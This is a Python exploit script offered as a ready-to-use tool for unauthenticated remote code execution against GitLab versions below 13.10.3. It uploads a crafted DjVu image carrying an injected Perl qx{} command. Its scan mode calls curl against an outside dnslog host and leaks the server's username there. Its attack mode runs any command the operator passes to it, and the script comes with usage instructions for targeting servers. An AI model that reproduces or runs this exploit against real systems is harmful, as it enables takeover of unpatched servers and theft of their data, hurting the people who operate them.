exploit.py

import sys
import os
import requests
from bs4 import BeautifulSoup
import base64
import random
import argparse

requests.packages.urllib3.disable_warnings()

def header():
	print("""
         __                     _   _  _ 
        /__ o _|_ |   _. |_    |_) /  |_ 
        \_| |  |_ |_ (_| |_)   | \ \_ |_   

                Author : Hendrik Agung
        Github : https://github.com/runsel | Blog : https://blog.runsel.id 
		""")
	usage()

def usage():
	print('''
	Usage :
		- Test Vuln : python3 exploit.py -t http://target.com
		- RCE Expl  : python3 exploit.py -t http://target.com -c "command"
		''')

def scan(target):
	session = requests.Session()
	try:
		print("[$] Checking {}".format(target))

		req = session.get(target.strip("/") + "/users/sign_in", verify=False)
		soup = BeautifulSoup(req.text, features="lxml")
		token = soup.findAll('meta')[16].get("content")

		# Payload
		data = "\r\n------WebKitFormBoundaryIMv3mxRg59TkFSX5\r\nContent-Disposition: form-data; name=\"file\"; filename=\"test.jpg\"\r\nContent-Type: image/jpeg\r\n\r\nAT&TFORM\x00\x00\x03\xafDJVMDIRM\x00\x00\x00.\x81\x00\x02\x00\x00\x00F\x00\x00\x00\xac\xff\xff\xde\xbf\x99 !\xc8\x91N\xeb\x0c\x07\x1f\xd2\xda\x88\xe8k\xe6D\x0f,q\x02\xeeI\xd3n\x95\xbd\xa2\xc3\"?FORM\x00\x00\x00^DJVUINFO\x00\x00\x00\n\x00\x08\x00\x08\x18\x00d\x00\x16\x00INCL\x00\x00\x00\x0fshared_anno.iff\x00BG44\x00\x00\x00\x11\x00J\x01\x02\x00\x08\x00\x08\x8a\xe6\xe1\xb17\xd9*\x89\x00BG44\x00\x00\x00\x04\x01\x0f\xf9\x9fBG44\x00\x00\x00\x02\x02\nFORM\x00\x00\x03\x07DJVIANTa\x00\x00\x01P(metadata\n\t(Copyright \"\\\n\" . qx{curl `whoami`.82sm53.dnslog.cn} . \\\n\" b \") )                                                                                                                                                                                                                                                                                                                                                                                                                                     \n\r\n------WebKitFormBoundaryIMv3mxRg59TkFSX5--\r\n\r\n"
		headers = {
            "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36",
            "Connection": "close",
            "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryIMv3mxRg59TkFSX5",
            "X-CSRF-Token": f"{token}", "Accept-Encoding": "gzip, deflate"}

		resp = session.post(target.strip("/") + "/uploads/user", data=data, headers=headers, verify=False)

		if "Failed to process image" in resp.text:
			print("[+] Target {} vulnerable".format(target))
		else:
			print("[X] Failed, target {} may be not vulnerable".format(target))
	except Exception as e:
		print(e)

def attack(target, command):
	session = requests.Session()
	try:
		print("[$] Checking {}".format(target))
		req = session.get(target.strip("/") + "/users/sign_in", verify=False)
		soup = BeautifulSoup(req.text, features="lxml")
		token = soup.findAll('meta')[16].get("content")

		# Payload
		data = "\r\n------WebKitFormBoundaryIMv3mxRg59TkFSX5\r\nContent-Disposition: form-data; name=\"file\"; filename=\"test.jpg\"\r\nContent-Type: image/jpeg\r\n\r\nAT&TFORM\x00\x00\x03\xafDJVMDIRM\x00\x00\x00.\x81\x00\x02\x00\x00\x00F\x00\x00\x00\xac\xff\xff\xde\xbf\x99 !\xc8\x91N\xeb\x0c\x07\x1f\xd2\xda\x88\xe8k\xe6D\x0f,q\x02\xeeI\xd3n\x95\xbd\xa2\xc3\"?FORM\x00\x00\x00^DJVUINFO\x00\x00\x00\n\x00\x08\x00\x08\x18\x00d\x00\x16\x00INCL\x00\x00\x00\x0fshared_anno.iff\x00BG44\x00\x00\x00\x11\x00J\x01\x02\x00\x08\x00\x08\x8a\xe6\xe1\xb17\xd9*\x89\x00BG44\x00\x00\x00\x04\x01\x0f\xf9\x9fBG44\x00\x00\x00\x02\x02\nFORM\x00\x00\x03\x07DJVIANTa\x00\x00\x01P(metadata\n\t(Copyright \"\\\n\" . qx{"+  command +"} . \\\n\" b \") )                                                                                                                                                                                                                                                                                                                                                                                                                                     \n\r\n------WebKitFormBoundaryIMv3mxRg59TkFSX5--\r\n\r\n"
		headers = {
            "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36",
            "Connection": "close",
            "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryIMv3mxRg59TkFSX5",
            "X-CSRF-Token": f"{token}", "Accept-Encoding": "gzip, deflate"}

		resp = session.post(target.strip("/") + "/uploads/user", data=data, headers=headers, verify=False)

		if "Failed to process image" in resp.text:
			print("[+] Target {} vulnerable".format(target))
			print("[#] Exploit success!")
		else:
			print("[X] Failed, target {} may be not vulnerable".format(target))
	except Exception as e:
		print(e)

def main():
	parser = argparse.ArgumentParser(description='GitLab < 13.10.3 Unauthenticated RCE')
	parser.add_argument('-t', help='Url (Ex: https://gitlab.target.com)', required=True)
	parser.add_argument('-c', help='Command to execute')

	args = parser.parse_args()
	target = args.t
	command = args.c

	if len(sys.argv) > 1:
		if command != None and target != None:
			attack(target, command)
		elif target != None:
			scan(target)
		else:
			sys.exit(0)
	else:
		sys.exit(0)

if __name__ == '__main__': 
	header()
	main()